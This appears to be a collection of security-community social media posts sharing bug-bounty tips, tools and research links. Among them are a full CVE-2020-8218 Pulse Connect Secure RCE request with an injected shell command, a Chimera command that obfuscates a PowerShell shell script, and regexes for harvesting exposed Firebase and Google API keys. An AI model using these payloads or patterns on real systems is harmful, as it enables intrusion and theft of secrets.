You can use #httpx to request any path and see the status code and length and other details on the go, filter, or matcher flags if you want to be more specific. httpx -path /swagger-api/ -status-code -content-length #hackwithautomation #recon #bugbountytips #infosec

This audio based vector uses the ondurationchange event which fires when the audio is loaded and the duration changes. Hit play if you love Burp! portswigger.net/web-security/c…

We just won 3 months of #pro access to PentesterLab from the DEF CON Mehedi Hasan Remon! Check out redteamvillage.io and follow @pwneip NOPResearcher for more events! 🏴‍☠️🦊😁

Samsung CTF Android Reverse Engineering Challenge Write-up #MobileSecurity #AndroidSecurity by @x64mayhem link.medium.com/BPDhkTZt48

Abusing Gmail to get previously unlisted e-mail addresses A classic user enumeration attack on Gmail that allowed me to retrieve thousands of e-mail addresses. blog.0day.rocks/abusing-gmail-…

Android Universal Boot Rooting Toolkit - converts stock boot images and adds hidden root (accessible via netcat session), patches selinux and adds adb #MobileSecurity #AndroidSecurity by Bjoern Kerler github.com/bkerler/androi…

CVE-2020-8218 Pulse Connect Secure post-auth RCE https://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc gosecure.net/blog/2020/08/2…

Iblessing - An iOS Security Exploiting Toolkit, It Mainly Includes Application Information Collection, Static Analysis And Dynamic Analysis feedproxy.google.com/~r/PentestTool…

./chimera --level 2 --all --typedata cmd.exe --comments /tmp/harry_potter.txt --string getstream --backticks new-object -f shells/generic1.ps1 -o /tmp/chimera.ps1 # github.com/tokyoneon/Chim…

Remember Abss who landed $30k from researching exposed Firebase keys?🔥 He used these regexes: AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140} AIza[0-9A-Za-z_-]{35} #BugBountyTip #HackWithIntigriti

Excited to share my latest research! h2c smuggling: request smuggling via HTTP/2 cleartext. Leveraging TCP tunnels provided by HTTP/1.1 upgrades, we can initiate h2c connections directly with compatible back-end services, bypassing proxy access controls. labs.bishopfox.com/tech-blog/h2c-…

How to Hunt Bugs in SAML; a Methodology epi052.gitlab.io/notes-to-self/…

This is a big TIL for me! If you put a space before your command, it is not saved to the history.🤯

/var/lib/cloud/instance/boot-finished /var/lib/cloud/instance/cloud-config.txt /var/lib/cloud/instance/datasource /var/lib/cloud/instance/handlers/ /var/lib/cloud/instance/obj.pkl /var/lib/cloud/instance/scripts/ /var/lib/cloud/instance/sem/ /var/lib/cloud/instance/user-data.txt

ARM64 Reversing and Exploitation Part 1 - ARM Instruction Set + Simple Heap Overflow highaltitudehacks.com/2020/09/05/arm…

So yes, Zerologon (CVE-2020-1472) is quite easy to exploit. Unauthenticated user to Domain Admin. This is really scary. Run exploit, DCSync with DC account and empty NT hash: you have Domain Admin and a broken DC. Awesome find by Tom Tervoort 🙂. Patch patch patch!

We've updated HTTP Request Smuggler with a settings button, and syntax highlighting in the Smuggle Attack window. Have a good weekend! github.com/PortSwigger/ht…

Testing for XSS via “javascript:” but it’s blocked by a WAF? Try these bypasses. Thanks for the #BugBountyTip, @[email protected]! #BugBountyTips #HackWithIntigriti

#Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS #MobileSecurity by Check Point Research 🔥 research.checkpoint.com/2020/instagram…

I created this basic chrome extension to find prototype pollution. You won't believe the applications where PP exist, it's everywhere. I hope you make internet pollution free :xD. github.com/msrkp/PPScan